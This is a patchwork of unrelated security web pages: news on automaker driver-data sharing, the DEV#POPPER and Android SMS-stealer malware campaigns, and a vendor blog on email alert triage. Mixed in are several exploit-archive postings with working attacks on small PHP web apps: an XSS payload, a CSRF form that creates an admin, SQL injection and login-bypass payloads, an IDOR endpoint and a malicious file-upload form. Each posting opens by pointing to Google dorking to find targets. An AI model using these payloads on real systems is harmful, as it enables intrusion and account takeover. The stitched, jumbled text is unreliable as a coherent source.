Two US senators accuse carmakers of deceptive language and shifty practices in sharing and resale of driver data.

Source: CC7 via Shutterstock

Two US senators have called on the US Federal Trade Commission (FTC) to hold automakers accountable for sharing driver data without consent, highlighting the growing data privacy challenges — and deceptive verbiage from terms of service — associated with modern smart cars.

In a letter to the FTC (PDF) last week, Sens. Ron Wyden (D-Ore.) and Edward Markey (D-Mass.) used the data-sharing practices of General Motors, Honda, and Hyundai as symptomatic of an industrywide problem that needs immediate investigation.

**Data Sharing Without Consent**

All three vendors collected and sold driver information such as acceleration and braking data to Verisk, a data analytics company that used the information to prepare driver behavior reports that it then resold to insurance companies. By their own account, none of the automakers obtained informed consent from customers before sharing their information. Instead, they deliberately obscured their data-sharing relationship with Verisk in lengthy disclosures and made deceptive claims about how they would use driver data, the senators charged.

"The FTC should hold accountable the automakers, which shared their customers' data with data brokers without obtaining informed consent, as well as the data brokers, which resold data that had not been obtained in a lawful manner," their letter noted. "Given the high number of consumers impacted, and the outrageous manipulation of consumers using dark patterns, the FTC should also hold senior company officials responsible for their flagrant abuse of their customers' privacy."

The letter highlights just one aspect of what many say is a rapidly growing set of security and privacy issues around modern, highly connected software-defined vehicles. While such vehicles offer increased automation, autonomous capabilities, and highly customizable user experiences, they also collect an enormous amount of data that can be hard to protect and secure.

"Your vehicle knows your name, your home address, your debit/credit card info, how fast you drive, how hard you brake, what you ask its voice assistant, the locations you frequent and at what times," says Riley Keehn, lead regulatory and government affairs consultant for SBD Automotive, an automotive research and consulting firm. "Certain occupant detection and automated driving cameras and sensors can even see you and your surroundings."

The onboard storage of this sheer volume of personal and identifying information (PII) and sensitive data types make drivers and their vehicles the direct targets of cyberattacks. These attacks can happen via hardwired systems like the OBD-II port or even the headlights, connections to the vehicle via shared and insecure Wi-Fi networks, through electric vehicle charging stations, compromised aftermarket components, and other means, Keehn says.

Some of these risks can be addressed via security-by-design approaches and the implementation of industry best practices and regulations, such as UN R155 on Cybersecurity Management Systems (CSMS) and UN R156 on Software Update Management Systems (SUMS), ISO/SAE 21434:2021 on Cybersecurity Engineering for Road Vehicles, and other international and regional requirements, she notes.

**A Complete Lack of Consumer Privacy Protections?**

But where things can get messy is what happens to personal data after a vehicle collects it. "The US still lacks a comprehensive, general data privacy regulation comparable to the EU's GDPR, China's PIPL/DSL/CSL framework, and other global regulations that have adopted the GDPR's model and stringency," Keehn says.

The US largely relies on sector-specific regulations, such as HIPAA in healthcare, to address unique data privacy and security requirements. Individual states have filled that gap with their own data privacy laws, creating a patchwork of inconsistent rules, often exempting certain sectors and technologies. While some states may have clear requirements for how an original equipment manufacturer (OEM) must handle the storage, collection, sharing, and sale of data, other states may have different requirements or none at all, she says.

"This inconsistency and lack of national guidance in the US creates a host of risks at the business level and can foster an OEM culture where security stops with the vehicle," Keehn adds.

**Can the FTC Really Drive Change?**

David Brumley, CEO of software security firm ForAllSecure, says car companies should be required to ask for informed consent from drivers to share their information for advertising or for any other purpose not specific to delivering a required feature. 

"Over-the-air software updates? Probably being served from Amazon or Google. Maps? Probably from a third-party. Accurate position? It's not just GPS; often it's assisted with other metadata — like Swift Navigation — to increase accuracy," Brumley notes.

A car vendor might require some data, like location information, for instance, to provide services such as roadside assistance, traffic warnings, and autonomous driving. So there needs to be separate consent requirement for sharing such data and for sharing data for pure profit reasons, he says. "Second, we need a law that says companies must not limit functionality when someone opts out," he adds. "Someone shouldn't be able to force your consent so you can keep driving to work."

Brumley says it's unrealistic, however, to expect the FTC to drive much change. "They don't exercise their regulatory powers in other domains, and instead rely on free-market" dynamics, which won't help here, he says. "Where we may get a bump is EU regulations, which tend to be stricter.  We also need consumers to speak up that it impacts their buying decisions."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Smart Cars Share Driver Data, Prompting Calls for Federal Scrutiny

AMPLE BILLS version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : AMPLE BILLS v1.0 XSS Vulnerability                                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : app/invoice/mpdf/examples/formsubmit.php?1<ScRiPt>prompt(913011)</ScRiPt>[+] http://localhost/ample/app/invoice/mpdf/examples/formsubmit.php?1%3CScRiPt%3Eprompt(913011)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AMPLE BILLS 1.0 Cross Site Scripting

Aero CMS version 0.0.1 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Aero CMS v0.0.1 CSRF Vulnerability                                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://codeload.github.com/MegaTKC/AeroCMS/zip/refs/heads/master                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 9.[+] Set the target site link Save changes and apply . [+] infected file : admin/users.php?source=add_user[+] save code as poc.html .<form action="https://127.0.0.1/pepopecocom/admin/users.php?source=add_user" method="POST">  <div>    <label for="username">Username:</label>    <input type="text" id="username" name="username" required>  </div>  <div>    <label for="password">Password:</label>    <input type="password" id="password" name="password" required>  </div>  <div>    <label for="user_email">Email:</label>    <input type="email" id="user_email" name="user_email" required>  </div>  <div>    <label for="user_first_name">First Name:</label>    <input type="text" id="user_first_name" name="user_first_name" required>  </div>  <div>    <label for="user_last_name">Last Name:</label>    <input type="text" id="user_last_name" name="user_last_name" required>  </div>  <div>    <label for="user_image">Profile Image:</label>    <input type="file" id="user_image" name="user_image">  </div>  <div>    <label for="user_role">User Role:</label>    <select id="user_role" name="user_role" required>      <option value="admin">Admin</option>      <option value="editor">Editor</option>      <option value="subscriber">Subscriber</option>    </select>  </div>  <div>    <button type="submit" name="create_user">Create User</button>  </div></form>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Aero CMS 0.0.1 Cross Site Request Forgery

SchoolPlus LMS version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : SchoolPlus LMS v1.0 SQL injection Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : index.php?project_type_id=1[+] https://www/127.0.0.1/demo/bccnorgnp/projects/index.php?project_type_id=1 <=== inject here[+] Parameter: project_type_id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: project_type_id=1 AND 5604=5604    Type: stacked queries    Title: MySQL < 5.0.12 stacked queries (BENCHMARK - comment)    Payload: project_type_id=1;SELECT BENCHMARK(5000000,MD5(0x45507849))#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: project_type_id=1 AND (SELECT 5053 FROM (SELECT(SLEEP(5)))tLpS)    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: project_type_id=-7152 UNION ALL SELECT NULL,CONCAT(0x717a766271,0x6e496a5078736e466d5662454c5a6a73517278504b4d786866495454786d56417073505956586b70,0x71716a6a71)-- ----Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SchoolPlus LMS 1.0 SQL Injection

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

Posted Jul 31, 2024

Authored by indoushka

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 760d2e5184238b42e8f1ba299d632f9a683af578d5af3fd433dd135eb0ceb06b

Download | Favorite | View

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : AccPack Khanepani v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new file in the list.[+] use payload : cms/gallery/insert.php[+] http://127.0.0.1/jamiatulamanepalorgnp/cms/gallery/insert.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,223)
*   Arbitrary (16,842)
*   BBS (2,859)
*   Bypass (1,855)
*   CGI (1,033)
*   Code Execution (7,784)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,384)
*   DoS (25,024)
*   Encryption (2,389)
*   Exploit (53,098)
*   File Inclusion (4,257)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,885)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (896)
*   Kernel (7,184)
*   Local (14,788)
*   Magazine (586)
*   Overflow (13,165)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,631)
*   Remote (31,625)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,024)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,594)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,921)
*   Web (9,953)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,239)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,580)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,432)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,710)
*   UNIX (9,432)
*   UnixWare (187)
*   Windows (6,668)
*   Other

AccPack Khanepani 1.0 Insecure Direct Object Reference

AccPack Cop version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AccPack Cop v1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Cop 1.0 SQL Injection

AccPack Buzz version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : AccPack Buzz v1.0 Remote File Upload Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] use payload : <html><head>  <title>Add</title></head><body>  <div align="center"><form action="http://127.0.0.1/jamiatulamanepalorgp/cms/gallery/insert.php" method="POST"  enctype="multipart/form-data"><table>  <tr>    <td>Image</td><td>      <input type="file" name="image-upload" id="image-upload"></td>   </tr>   <tr>    <td>Status</td><td>      <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>      <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>    </td>   </tr>      <tr style='height:80'>    <td colspan="2"><input type='submit' value='Submit'><input type='reset' Value='Reset'></td>   </tr></table></form></div></body></html>[+] In the seventh line, we change the link to the target link.[+] Link to the uploaded files : cms/image/gallery/[+] The script renames the file to a number, and you always choose numbers starting from the number 9 and above.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Buzz 1.0 Arbitrary File Upload

The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems.
The activity cluster, dubbed DEV#POPPER and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East.
"This form of attack is an

Malware / Software Development

The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems.

The activity cluster, dubbed **DEV#POPPER** and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East.

"This form of attack is an advanced form of social engineering, designed to manipulate individuals into divulging confidential information or performing actions that they might normally not," Securonix researchers Den Iuzvyk and Tim Peck said in a new report shared with The Hacker News.

DEV#POPPER is the moniker assigned to an active malware campaign that tricks software developers into downloading booby-trapped software hosted on GitHub under the guise of a job interview. It shares overlaps with a campaign tracked by Palo Alto Networks Unit 42 under the name Contagious Interview.

Signs that the campaign was broader and cross-platform in scope emerged earlier this month when researchers uncovered artifacts targeting both Windows and macOS that delivered an updated version of a malware called BeaverTail.

The attack chain document by Securonix is more or less consistent in that the threat actors pose as interviewers for a developer position and urge the candidates to download a ZIP archive file for a coding assignment.

Present with the archive is an npm module that, once installed, triggers the execution of an obfuscated JavaScript (i.e., BeaverTail) that determines the operating system on which it's running and establishes contact with a remote server to exfiltrate data of interest.

It's also capable of downloading next-stage payloads, including a Python backdoor referred to as InvisibleFerret, which is designed to gather detailed system metadata, access cookies stored in web browsers, execute commands, upload/download files, as well as log keystrokes and clipboard content.

New features added to the recent samples include the use of enhanced obfuscation, AnyDesk remote monitoring and management (RMM) software for persistence, and improvements to the FTP mechanism employed for data exfiltration.

Furthermore, the Python script acts as a conduit to run an ancillary script that's responsible for stealing sensitive information from various web browsers – Google Chrome, Opera, and Brave – across different operating systems.

"This sophisticated extension to the original DEV#POPPER campaign continues to leverage Python scripts to execute a multi-stage attack focused on exfiltrating sensitive information from victims, though now with much more robust capabilities," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korea-Linked Malware Targets Developers on Windows, Linux, and macOS

We’ll TL;DR the FUDdy introduction: we all know that phishing attacks are on the rise in scale and complexity, that AI is enabling more sophisticated attacks that evade traditional defenses, and the never-ending cybersecurity talent gap means we’re all struggling to keep security teams fully staffed. 
Given that reality, security teams need to be able to monitor and respond to threats

We'll TL;DR the FUDdy introduction: we all know that phishing attacks are on the rise in scale and complexity, that AI is enabling more sophisticated attacks that evade traditional defenses, and the never-ending cybersecurity talent gap means we're all struggling to keep security teams fully staffed.

Given that reality, security teams need to be able to monitor and respond to threats effectively and efficiently. You obviously can't let real threats slip past unnoticed, but you also can't afford to waste time chasing false positives.

In this post, we're going to look at some of the ways Material Security's unique approach to email security and data protection can dramatically–and quantifiably–save your security teams hours each week while improving the effectiveness of your security program.

**What's Your Alert Budget?**

Before we dive into the "how," let's take a moment to look at _why_ efficiency is critical in security operations. To do that, let's think about how many alerts can your security and incident response teams realistically triage, investigate, and respond to in a given day. Just like your department has a budget that limits how much money you can spend on people and tools, your security teams have a limit to the amount of time they can devote to responding to threats on any given day. **That's your alert budget**.

That number will change day-to-day, of course, depending on the severity and complexity of the incidents that pop, the number of critical strategic projects your team is working on, and myriad other factors. But there is a limit. And just as you can't afford to waste your limited financial resources on redundant tools or software that provides no value to your team, you can't afford for your teams to waste their alert budget investigating duplicate alerts, remediating the same issue over and over, or chasing false positives.

The efficiency with which your security team spends their alert budget is just as important as how you spend your money, if not more so. Now let's dive into how we help improve that efficiency.

**Balancing Accuracy and Sensitivity**

No matter how many alerts your team receives, there are a limited number of hours in any given day that your team can devote to responding to them. Material's approach to phishing has been built on the philosophy that we need to help our customers make the most of their time. The alerts we generate must both catch as many threats as possible–while also generating as few false positives as possible.

"Precision" and "recall" are terms that will be familiar to a data scientist, but may not immediately ring a bell for security folks. In the context of email detections, precision is a measure of how many emails flagged as malicious are actually malicious, while recall is a measure of how many of the actual malicious emails received are flagged by the system.

A security system that generates very few false positives has high precision, and a system that catches nearly all the threats it sees has high recall. At a certain granular level, there is some tradeoff between the two: as you can imagine, you can lower the number of false positives you generate by decreasing the sensitivity of the detections: but decreasing the sensitivity will often lead to true positives being missed as well. Conversely, you can minimize those missed true positives by turning the sensitivity way up, but doing so will generate more false positives.

The focus at Material has been to build a detection engine that balances the two effectively, and surfaces the malicious messages that you truly need to focus on. In today's increasingly-complex threat environment, no single layer of protection is sufficient–and no single method of detection can possibly strike the right balance on its own. To that end, the Material Detection Engine is made up of four key components:

*   **Material Detections:** A combination of machine learning techniques with rules built by our dedicated threat research team. AI and ML are great for connecting dots and finding relationships that humans may miss, but for all the advancements in AI lately, there's still no replacement for the insight and capability of human expertise. Material Detections are the best of both worlds.
*   **Custom Detections:** Every organization and every environment are unique, so we give customers the ability to create custom detections based on what you're seeing across your user base or out in the wild.
*   **Email Provider Alerts:** Google and Microsoft periodically issue alerts for phishing emails that they've detected post-delivery; we ingest and process those alerts and add them to our detections.
*   **User Reports:** Material automates your abuse mailbox, from ingesting user reports, consolidating similar messages within a single case, and applying automated protection immediately while providing flexible remediation flows to security teams.

All of these facets combine into a powerful and incredibly precise detection platform that gives our customers powerful protection without wasting their time with false positives and noise–striking what we believe to be the right balance between precision and recall. But while effectively balancing accuracy and sensitivity is critical, it's not enough: a modern email security platform also needs to streamline security operations themselves.

**Fool Me Twice, Shame on Me**

There's been a noticeable uptick in email attack campaigns that are not just wide-ranging but very personalized. There's debate about how much of this can be attributed to generative AI–the prevailing assumption was that the explosion of generative AI would give adversaries a new bag of tools to play with, but research like Verizon's 2024 DBIR show little meaningful impact on attacks and breaches at this point.

Regardless of whether these attacks are AI-generated or not, there's no denying they're on the rise. Sure, we all still get the generic and transparent '_are you available?'_ messages from our "CEOs" when we first join a new company. But we also get emails with fake invoices coming from domains that are spoofs or homoglyphs of trusted partners and vendors. We see complex pretexting attacks laying out completely believable stories from senders who appear to have connections with us. We receive emails from spoofed or homoglyph domains that fool even the most conscientious user.

And often these attacks are repeated across an organization, but tailored to each recipient. Not only do they evade native email security controls and make it through SEGs, but they appear as individual attacks. Subject lines, senders, and even body content can vary from email to email, making it hard to easily group them together–meaning your security team has to burn through multiple cycles to investigate and respond to dozens or hundreds of iterations of the exact same attack.

Material helps security and IR teams address this problem with automatic clustering of suspicious messages. When Material detects a potential threat, it automatically creates a Case within our platform. It then scours the entire environment for messages that match that case, based on a range of criteria. It looks for similarities among the usual fields, of course: matching senders, matching subject lines, matching body text, etc. But it also looks for things like the URLs embedded within the messages and attachment, matching attacks that are otherwise impossible to group by other means.

Material creates cases for all detected messages, and clusters similar messages together, simplifying investigation and remediation.

And when messages are clustered together in a single case, it makes triage, investigation, and even remediation significantly simpler. Speedbumps by default are automatically applied to _all_ the messages within the case–so your users will get a warning that the message may be malicious before your team even has a chance to investigate. And once you've investigated and applied a remediation to a single message within the case, every message in that case–even matched messages that are delivered after your investigation–receive that same remediation.

We've already seen powerful examples of how this helps our customers in the real world. One Material customer recently told us that they tracked their phishing email investigations over a three-month period. In those 90 days with Material Security's help, their SOC saved over 300 hours of time investigating and responding to phishing emails. All those hours stayed in their alert budget to deal with other pressing matters.

**Harnessing Your Organization's Collective Intelligence**

Today's workforce is well aware of phishing threats. That doesn't mean they don't still fall for them, of course, but it means they're on the lookout for suspicious, poorly-worded, or simply unexpected messages.

And it's important to get it right. No single line of defense is going to catch all inbound email threats, and for all the incredible advancements in AI and machine detections, sometimes there's no substitute for a keen-eyed employee noticing an email just doesn't pass the sniff test.

The downside is that _handling_ user reporting can also be a significant drain on your security team if not handled correctly. Duplicate reports, harmless emails flagged for review, the need to respond to the user(s) who flagged… when you add up the minutes all of these actions require over dozens or hundreds of reports every day, it can be a significant time suck.

Material automates the full lifecycle of user report response, applying immediate herd immunity to all messages within a reported message case across your entire organization.

Material cuts away the day-to-day backend slog of user reporting, automating your abuse mailbox to both speed remediation and save your security team time. Material automatically adds a speedbump to reported messages across your entire user base, providing an immediate layer of protection while your security team investigates the issue.

Granular remediation options allow your teams to speedbump, block links, or outright delete reported emails that turn out to be malicious. And thanks to case consolidation and similar message matching, when you've investigated and responded to one email, you've responded to every similar message in the entire case. Finally, Material automatically responds to reporters with an acknowledgement message–that you can change or update as your investigation proceeds if you wish.

Material simplifies and streamlines the process of ingesting and responding to user reporting, while adding immediate protection to provide air cover for investigations.

**Advanced Protection You Can Trust, Efficiency You Can Take to the Bank**

Your security teams have to juggle enough as it is. With Material Security, they'll chase far fewer false positives, triage and investigate phishing cases faster, and spend less time on administrative busywork with user reporting. Material frees up more of your alert budget so you can spend it on what really matters.

To see how much time you can give back to your security team, contact us for a demo today.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

How To Get the Most From Your Security Team’s Email Alert Budget

A new malicious campaign has been observed making use of malicious Android apps to steal users' SMS messages since at least February 2022 as part of a large-scale campaign.
The malicious apps, spanning over 107,000 unique samples, are designed to intercept one-time passwords (OTPs) used for online account verification to commit identity fraud.
"Of those 107,000 malware samples, over 99,000 of

A new malicious campaign has been observed making use of malicious Android apps to steal users' SMS messages since at least February 2022 as part of a large-scale campaign.

The malicious apps, spanning over 107,000 unique samples, are designed to intercept one-time passwords (OTPs) used for online account verification to commit identity fraud.

"Of those 107,000 malware samples, over 99,000 of these applications are/were unknown and unavailable in generally available repositories," mobile security firm Zimperium said in a report shared with The Hacker News. "This malware was monitoring one-time password messages across over 600 global brands, with some brands having user counts in the hundreds of millions of users."

Victims of the campaign have been detected in 113 countries, with India and Russia topping the list, followed by Brazil, Mexico, the U.S., Ukraine, Spain, and Turkey.

The starting point of the attack is the installation of a malicious app that a victim is tricked into installing on their device either through deceptive ads mimicking Google Play Store app listings or any of the 2,600 Telegram bots that serve as the distribution channel by masquerading as legitimate services (e.g., Microsoft Word).

Once installed, the app requests permission to access incoming SMS messages, following which it reaches out to one of the 13 command-and-control (C2) servers to transmit stolen SMS messages.

"The malware remains hidden, constantly monitoring new incoming SMS messages," the researchers said. "Its primary target is OTPs used for online account verification."

It's currently not clear who is behind the operation, although the threat actors have been observed accepting various payment methods, including cryptocurrency, to fuel a service called Fast SMS (fastsms\[.\]su) that allows customers to purchase access to virtual phone numbers.

It's likely that the phone numbers associated with the infected devices are being used without the owner's knowledge to register for various online accounts by harvesting the OTPs required for two-factor authentication (2FA).

In early 2022, Trend Micro shed light on a similar financially-motivated service that corralled Android devices into a botnet that could be used to "register disposable accounts in bulk or create phone-verified accounts for conducting fraud and other criminal activities."

"These stolen credentials serve as a springboard for further fraudulent activities, such as creating fake accounts on popular services to launch phishing campaigns or social engineering attacks," Zimperium said.

The findings highlight the continued abuse of Telegram, a popular instant messaging app with over 950 million monthly active users, by malicious actors for different purposes ranging from malware propagation to C2.

Earlier this month, Positive Technologies disclosed two SMS stealer families dubbed SMS Webpro and NotifySmsStealer that target Android device users in Bangladesh, India, and Indonesia with an aim to siphon messages to a Telegram bot maintained by the threat actors.

Also identified by the Russian cybersecurity company are stealer malware strains that masquerade as TrueCaller and ICICI Bank, and are capable of exfiltrating users' photos, device information, and notifications via the messaging platform.

"The chain of infection starts with a typical phishing attack on WhatsApp," security researcher Varvara Akhapkina said. "With few exceptions, the attacker uses phishing sites posing as a bank to get users to download apps from them."

Another malware that leverages Telegram as a C2 server is TgRAT, a Windows remote access trojan that has recently been updated to include a Linux variant. It's equipped to download files, take screenshots, and run commands remotely.

"Telegram is widely used as a corporate messenger in many companies," Doctor Web said. "Therefore, it is not surprising that threat actors can use it as a vector to deliver malware and steal confidential information: the popularity of the program and the routine traffic to Telegram's servers make it easy to disguise malware on a compromised network."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google